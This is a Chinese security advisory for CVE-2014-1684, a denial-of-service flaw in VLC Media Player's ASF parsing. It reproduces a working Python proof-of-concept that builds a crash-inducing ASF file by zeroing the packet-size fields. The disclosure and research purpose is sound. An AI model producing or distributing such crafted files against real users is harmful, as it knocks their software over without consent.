首页 -> 安全研究

安全研究

安全漏洞
VLC Media Player '.asf'文件拒绝服务漏洞

发布日期:2014-02-05
更新日期:2014-02-17

受影响系统:
VideoLAN VLC Media Player < 2.1.2
描述:
BUGTRAQ  ID: 65399
CVE(CAN) ID: CVE-2014-1684

VLC Media Player是多媒体播放器。

VLC Media Player 2.1.2及之前版本在ASF分流器的实现上存在整数除零错误,如果最小的数据包大小为零,则攻击者可利用此漏洞使受影响应用崩溃。

<*来源:Saif
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/python
# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer
# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size
# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2
# to run this script you need to install python bitstring module
# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc

import sys
from bitstring import BitArray

f = open(sys.argv[1],'r+b')

f.seek(0,2)

size = f.tell()

print "[*] file size: %d" % size

f.seek(0,0)

print "[*] ReeeeeWWWWWWiiiiiNNNNNNND"

fb = BitArray(f)

index  =  fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True)

print "[*] found file properties GUID"
print "[*] File properties GUID: %s" % fb[index[0]:(index[0]+128)]

# index of minumum packet size in File Proprties header
i_min_data_pkt_size = index[0] +  736

print "[*] Original Minimum Data Packet Size: %s" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex
print "[*] Original Maximum Data Packet Size: %s" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex

# Accroding to ASF standarad the minimum data size and the maximum data size should be equal
print "[*] Changing Miniumum and Maximum Data packet size to 0"

# changing the data packets in bit array

fb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00
fb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00
fb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00
fb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00
fb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00
fb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00
fb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00
fb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00

print "[*] POC File Created poc.asf"

of = open('poc.asf','w+b')
fb.tofile(of)
of.close()
f.close()

建议:
厂商补丁:

VideoLAN
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.videolan.org/

浏览次数:1862
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客